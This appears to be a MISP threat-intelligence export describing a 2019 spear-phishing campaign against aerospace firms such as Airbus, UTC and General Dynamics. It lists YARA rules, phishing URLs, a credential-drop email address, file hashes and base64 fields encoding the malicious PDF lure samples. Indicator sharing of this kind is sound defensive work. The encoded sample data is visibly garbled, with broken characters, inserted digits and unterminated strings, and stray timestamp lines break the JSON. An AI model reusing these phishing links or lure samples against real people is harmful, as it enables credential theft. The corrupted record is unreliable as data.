2023-04-21 13:25:09 +00:00
{
2023-12-14 14:30:15 +00:00
"Event" : {
"analysis" : "1" ,
"date" : "2019-05-16" ,
"extends_uuid" : "" ,
"info" : "Targeted phishing - PDF documents / phishkit" ,
"publish_timestamp" : "1622024256" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1621850122" ,
"uuid" : "5cdd3938-7134-4908-9552-173cc0a8016e" ,
"Orgc" : {
"name" : "EUROLEA" ,
"uuid" : "5cdc2cdd-bca4-4a76-8955-03cdc0a8016e"
} ,
"Tag" : [
{
"colour" : "#0088cc" ,
"local" : "0" ,
"name" : "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
"local" : "0" ,
"name" : "misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#3bb800" ,
"local" : "0" ,
"name" : "enisa:nefarious-activity-abuse=\"spear-phishing-attacks\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#004646" ,
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
} ,
{
"colour" : "#0071c3" ,
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0087e8" ,
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#33FF00" ,
"local" : "0" ,
"name" : "tlp:green" ,
"relationship_type" : ""
} ,
{
"colour" : "#ffffff" ,
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
}
] ,
"Attribute" : [
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558002233" ,
"to_ids" : false ,
"type" : "yara" ,
"uuid" : "5cdd3a39-84f0-4179-b3ea-173cc0a8016e" ,
"value" : "rule PDF_LIFT {\r\nstrings:\r\n\t$a = \"Rect[ 195.05 428.59 411.79 489.67]\"\r\ncondition:\r\n\tall of them\r\n}"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "Generic yara rule to find the common JAT author." ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012404" ,
"to_ids" : true ,
"type" : "yara" ,
"uuid" : "5cdd3a5b-3448-49d1-b35e-12a4c0a8016e" ,
"value" : "rule PDF_JAT_AUTHOR {\r\nstrings:\r\n$a = \"<</Author(JAT)\"\r\ncondition:\r\nall of them\r\n}"
} ,
{
"category" : "Network activity" ,
"comment" : "Email used to send credentials (found in the sendmail.php file)" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558010661" ,
"to_ids" : true ,
"type" : "email-dst" ,
"uuid" : "5cdd5b25-5624-4404-b507-c170950d210f" ,
"value" : "jatboss6@gmail.com"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558010725" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd5b65-9f28-4c2f-944e-444b950d210f" ,
"value" : "https://lulufabllc.com/doc/cdnrg.com/index.php"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558010725" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd5b65-dcb0-49b0-bf70-4129950d210f" ,
"value" : "https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558010725" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd5b65-5d90-4cdf-ab91-4355950d210f" ,
"value" : "https://www.arbutusroutes.com/document/standardaero.com/"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558010725" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd5b65-0804-4636-bffe-491e950d210f" ,
"value" : "https://www.arbutusroutes.com/document/utc.com/"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558010725" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd5b65-b1f0-4e0f-bf15-4c53950d210f" ,
"value" : "https://www.arbutusroutes.com/document/gd.com/"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558011379" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd5dcf-4a6c-4843-94b3-4d49950d210f" ,
"value" : "https://www.arbutusroutes.com/document/airbus.com/"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012892" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd63dc-0e48-4b97-bb9e-43ff950d210f" ,
"value" : "airbus.com"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012892" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd63dc-b678-4fae-bd00-4390950d210f" ,
"value" : "tenova.com"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012892" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd63dc-29ec-42c0-936b-4d9d950d210f" ,
"value" : "standardaero.com"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012892" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd63dc-713c-4eb6-adf5-4f3e950d210f" ,
"value" : "gd.com"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012892" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd63dc-ab44-4ab7-be4b-4aa1950d210f" ,
"value" : "utc.com"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558012892" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd63dc-0b30-404e-a1c4-4479950d210f" ,
"value" : "cdnrg.com"
} ,
{
"category" : "Network activity" ,
"comment" : "Older phishing link where the login page was mirror in Wed, 12 Sep 2018 06:29:39 GMT" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558013248" ,
"to_ids" : false ,
"type" : "url" ,
"uuid" : "5cdd6540-3188-4be6-8664-4555950d210f" ,
"value" : "http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558013658" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cdd66da-91e4-49bb-a834-409b950d210f" ,
"value" : "https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php"
} ,
{
"category" : "Network activity" ,
"comment" : "Phishing links" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558013991" ,
"to_ids" : false ,
"type" : "url" ,
"uuid" : "5cdd6827-982c-43af-9aa9-4212950d210f" ,
"value" : "https://arbutusroutes.com/ssl/akhurst.com/index.php"
} ,
{
"category" : "Targeting data" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1558014011" ,
"to_ids" : false ,
"type" : "target-org" ,
"uuid" : "5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
"value" : "akhurst.com"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558013350" ,
"uuid" : "97bd5034-12a0-4c06-a779-de38deac6059" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "97bd5034-12a0-4c06-a779-de38deac6059" ,
"referenced_uuid" : "76f9b382-c58e-46f8-b174-42275f764d3e" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a8-2960-49f9-b4b8-4316950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558002045" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "5b241faa-dc1a-4c3c-884f-feddd4e660d7" ,
"value" : "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558002045" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "ecc46363-2c17-4cc9-9cb2-ede7e6414048" ,
"value" : "293456"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "entropy" ,
"timestamp" : "1558002045" ,
"to_ids" : false ,
"type" : "float" ,
"uuid" : "8930e85f-68ff-4ad2-90ae-bed8577cb4c9" ,
"value" : "7.9916395623958"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558002045" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "0cd8fb23-ca95-492d-bb4e-cdab5a44c5ce" ,
"value" : "9a58b7f8ba04c32c027126379456e444"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558002045" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "dd9786d6-2f7c-476f-a6f2-c4d2933b9dcd" ,
"value" : "b49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558002045" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "daa2508f-f5ca-4528-8565-7f950dbd2690" ,
"value" : "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha512" ,
"timestamp" : "1558002046" ,
"to_ids" : true ,
"type" : "sha512" ,
"uuid" : "574eb954-6ca4-40e5-858d-56a1d16d9c7d" ,
"value" : "1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J d i s E 5 C 0 w y G s 0 w E A F B 6 B A A g A B w A O W E 1 O G I 3 Z j h i Y T A 0 Y z M y Y z A y N z E y N j M 3 O T Q 1 N m U 0 N D R V V A k A A 3453 V x + O d 1 c d X g L A A E E I Q A A A A Q h A A A A T W v S E A O A o 2 a N 6 c R 7 J 3 n p 8 Y c b s W Q T l w k c j 7 d X E 14 w 3 + e 46 q m l 6 q c d x u 3 j 9 H 4 F G a h / K L G M n p n Q c 9e43 Z E / H H H y C m 4 c Q r m 9 / 98 F h e r c Q c j A a N b i R s Y 8 e O H y 0 5 q f 7 M t 8 O X s W f 6 L l v A k S J 7 g u 5 j C 11 N X z m W Y h r P F e V 0 M y 3 Y q a a K U k r / E L 6 f B K g o e x 7 I Z S F 1 Y J X f J 20 u a M N 7 i l F e F f / H / Z m b G P y / S 56 Y o h 6 O f I D A x I q d X h 3 i N X e D J f W g v 75 I q a g p J D V 14 Z A R Q 6 u c y 9 E h u f Y b y l 634 F H Q A O q 4 l a I n q v x O Q s i E d F m 1 H H d b f 2 N f 0 P D K 8 / J L z B 3 A 3 V G O 6 F c Q 7 R a 5 t S l g 3 F n T X z w B J 2 A 8 l U M c 1 n X V c p m h w Y o r S k 882 I M a / s 3 p R s M 0 78 q / O s 8 s H l N j V F t 0 B L S D N h k g F E L r 4 j t a w q 7 l / c A 1 I S / l x F a e o p B W L Z v f 0 r J z i + b B L s 8 r E k l r m 5 o e Y J + T a Z m Z V F R p C m U g 4 e M 2 f b g f i a z n D M 65 M Q T M T V r 4 b P Y O 1 U K n I i O p N g z G T u N x q o u V K 1 i t 5 b 5 N B q B A v j a Q A y I 5 o l d Y B 5 X f g y O d r q M B w Q i 5 w m z K p d 5 g f c v E 2 V a N U x v / S c G o H x H Y x 8 j 6 p D z 1 M p n o Z X d w h / F r n + i V u I c x d a f n w v E K Q x 1 j t T 7 p O Z 1 s u o j I p G c E V z Y S s H p Y r K F j Z o B y d 8 E h y Y E g / 4 b 56 Q x J a J 9 R G i I O C i 0 U b h V f H p k g S u d a a I S s O y O R X g 3 x 1e5 C r l + D q v y G Z n O A a B 8 A A l M r t R Q o 6 X 3 w 24 c K k c m U 9 M 2 k D T u G W 5 g p r i 8 V Z 8 B 6 E a 8 T W i V G E f v k A A 6 r 2 m B 4 H 3 D Q / q f I 7 e k D o h 3 / Z H V c U 3 Q x + W U P W Y b a G o i b d m g m A h u k m e 7 t p q p W o W s D 8 y E l 22 b j e A w 1 z 41 b c F k f R s M V u f G H R v d U Y 7 g F s z Q Z q 1 f h A X t 1 u W 2 v b M A J A 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
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558002046" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "518d0da6-dddf-443c-bea5-193dd524d2d3" ,
"value" : "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "mimetype" ,
"timestamp" : "1558002046" ,
"to_ids" : false ,
"type" : "mime-type" ,
"uuid" : "b96aeb28-6672-41a0-a347-7ab32ce9a4f1" ,
"value" : "PDF document, version 1.5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ssdeep" ,
"timestamp" : "1558002046" ,
"to_ids" : true ,
"type" : "ssdeep" ,
"uuid" : "1ec7e2a2-0b54-4352-ae04-1cbbc3bf5470" ,
"value" : "6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558013350" ,
"uuid" : "3a4f2299-8136-45ec-8927-223b672e4b88" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "3a4f2299-8136-45ec-8927-223b672e4b88" ,
"referenced_uuid" : "dcd9ca51-3194-44ee-86a2-5f0cf9b923f8" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a8-f358-4be1-b8be-4159950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "f321a32c-70b0-4300-8fe8-89b02058b187" ,
"value" : "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558002047" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "d33717e1-a1fd-4f1f-abf0-81dd122cf7ef" ,
"value" : "283714"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "entropy" ,
"timestamp" : "1558002047" ,
"to_ids" : false ,
"type" : "float" ,
"uuid" : "0bee4ae2-3047-4cf1-87b2-25ea78a77c53" ,
"value" : "7.9880939695683"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "4db6a162-7ac7-4093-9667-fd496af7e10f" ,
"value" : "164db8d1fe5f2ea9dd3ea826b2f0b808"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "cb526992-0b24-4b7b-8255-db30b3ab5d26" ,
"value" : "890efaa698f4d43aad15c3dbacb6c01544fd3e27"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "a145796b-37de-4d77-9427-61ded2c5dbaf" ,
"value" : "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha512" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "sha512" ,
"uuid" : "e9769aca-b300-4331-85bf-34921987bc2b" ,
"value" : "27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J h i s E 6 i + J E A C S I E A E J U B A A g A B w A M T Y 0 Z G I 4 Z D F m Z T V m M m V h O W R k M 2 V h O D I 2 Y j J m M G I 4 M D h V V A k A A 3853 V x / O d 1 c d X g L A A E E I Q A A A A Q h A A A A x e 9 F e P X H 5 b o a s 9 o w Q 9 o b C H h Q k 2 M O 28 r W M p + X p u e P F 9 M n 5 s T o Y 3 / D b 3 / n X O u J U c 0 F a i x G k l l C W q k D i e 22 Q B P M n Y u 4 v H i E f b l + H r N o V Y b C r / q C N 8 P T T a M 5 s 5 o T n x H L i I p K u a x X e + F a M Z h l G C r e G 4 P + S N m B a c 86 g 27 V X I F A D J O S f E 0 W x d R l W 1 v B 3 y p x 6 l r b A H P g 9 K X V x G B a v W 3 U e N r r H U x 1 a C T V 0 v Q j q b / D j 6 J z c 6 B i R I z S T E d 0 J t 1 n C R l P R X M G 2 p Z d Q u J G X G L C T u l w u B F U X E e F P A R l X D N b R R K l s M E d b i 0 8 X v + + u 6 l H N 9 v l t f 2 z 9 q I d / m Z x b H i 6 g N J V 4 T 0 e E b f Z w 6 C A y I z I a y g 3 D P Y M g g 8 Z 1 V u K J H t V e 0 V B Z Y T L t B t a 2 b p r x 7 r 24 y y U Z C p D W N F j O s M x d 8 A H 7 O e Y 5 R v 48 s k N u Z b P K k y e W P / p 2 U d 8 v 93 N 4 H q N c 7 c d K V W t G P P P O t W l S t P H U 93 x z y d 9 u J g F x V C W c / 4 Y S 5 q f p s t v m g D t g t I o J 8 c 0 D X t + R X o w 3 a c 6 x 5 m 4 O B 40 l n 9 t 2 f N w k 2 F b L t i 5 J h z V P + T X 7 r y g y D f f g c K i d k 4 B u 5 c N 1 l 4 + n Q l X D p W K o B C / L 1 X y 0 A F C g R 6e5 K V c R l n a a J t f J H 7 y + 68 Y e b 9 c 4 S u U 2 p Z Y D m l C 3 L F a X G G s 8 W n h u j r P h T e 5 a 7 E j / B Z e Q d I d u d F 4 k z 403 r P / + T i u z i F S G O N c Z q a O q q e M b b 5 U u F P i k S h z v 3 G c M m I g F 9 / m 1 h 9 Q B p K W 9 J Y + W 6 a D k P J U 1 M y U v V y h 5 W 9 L 1 I 7 Q V z j W 1 V R 6 y m G K k f g T 0 l v M T W o f 82 z i U 6 y A V z F 5 s g e B U C q s 43 z U Q u W A z / o E 9 N 84 s r + b S t s 1 r C 2 R r + 5 y t j w 97 l C 3 g g g 6 h d d P G 3 L M D x L o U s 7 O I J w b 2 R t X e Z W K U + X E V 7 l H H N S O f B B y 7 i / Z B 15 Q I M l l t H u s O F T H 9 k g o g G u x P A k B 2 h r x Y f l f z T K + k i O 0 A P j 7 G H C W X 0 p e y p x 1 J / 12 N t u z o 1 r 69 Z T K U Y y 73 s a W F Y / i Q J E h A 6 O j o 55 + O Y a z k J X O m c v r E w N W M 5 r R I u 3 U C P 0 9 g y X N I 6 j 2 I h 5 j + / j 2 R D m 8 k h 2 h u U m I 8 c I 9 G 4 n 86 n x U W R S o t b d / n B D h V 5 A F k y q Z F g o 8 v W + 8 Z 1 P j Z C i I O E L K J D l c w 8 u 6 i 8 K D Z z 1 Z M k G b g Z / Q A Q 7 N T q 7 T d q M T p r V T y 78 X 0 v t z P t x c J 0 1 n w b K i z q Q B m p A P q F y O k a V V 4 Z s Z D s 0 z Q N t d O N 1 V 60 K L t G B g s C Z + j 5 O 6 N 7 O Q z u b h s J N X m 3 C g g o E y H Y A f u m I f P B X R V d N B j r U e a w D o S G c / s q M 0 6 r q Q X 8 a A 6 G 7 I R v V 9 b D k l f L s E l L y 0 o Q P 5 q u N 3 A l c V o Y c q Z z w u 6 m 60 Q G v w X k H S G 7 C / J x V J T 3 L w 3 v 2 A u p V E v + 68 n D E s A b + S e F I j A C W Q o B Y U p Y 4 b G L 23 b l S w Q 9 g I a 7 B t / R L 2 A 75 D L J d m Y O x d V Q p W M M 1 i v g x k F V z 7 f S 3 P + X y m 86 j r d e r W 3 W U b g M P B v P 6 k U r W w c z g e M I 4 y 0 n R B X b l K O 7 O S Y 5 v w I m S w 2 k B a P F r / m + B r + h D m s S i a L R + g z 8 W k B p B m 6 s x Y b + Z R T J 3 p g b 37 v j D q v 8 x C + E + G i 7 + G X K s b O 5 O 0 N q Y y p m L C j q Z E / V k Y C Q f Z N p w C G O u z D U / a s E 7 W l 8 V y S D + L r G a + 7 Z b f r 4 / q w E T i b I x x 0 E c I 7 G / e 8 H J P 7 W l N u F u E K V B l n p u 1 Z Y 4 f f e u W w I 9 C 40 c 5 / 54 E W C S Q z 5 H p b b B 0 U J R g H h n w d K + v u I s n d r 8 T E a w z N P + Z 0 u x d T 8 k d E C s j Y q G I 2 E E o n 27 q 1 f m x M S m v 8 r F 5 g A c x 4 O w Q + I 9 b m e E x i j C m 0 b z e i m C q H r j N G g I Z 6 A X a G 7 H v d v 52 w 7 H B / P c g P L g P X H 26 d g D 6 V u v B B M k s 4 c 9 c C h v d a z L 66 z x A v v r T D Z m b T O w q I 3 F s G z 2 + 20 M T z g a c f g Y l Z c I B J M B i p C b a v o o 1 s h 0 Y A Z U d Q G o b R F m L H I 2 v b o I 0 C L c X Z + S 7 g r b D F a + 8 e E 7 h Y s D J V K r C N W 7 L l M m J C G F m U B Q p p 3 g K Z W r / l 1 P r U o S I M l Q z d Z b q E Y g Y c L n m y G W n M Y Z J 1 u r L Q P A L N 8 c y L / 3 f Z a i o J S b U B T m 91 q z y z j u t v q d N v 9 T E B 16 o Q 4 V t s Y R D n s N W W 1 + M i v O L a k I T T H g b g D z A g 0 v S S w o 0 F B w T 6 E C Z t Z j r J 2 F O 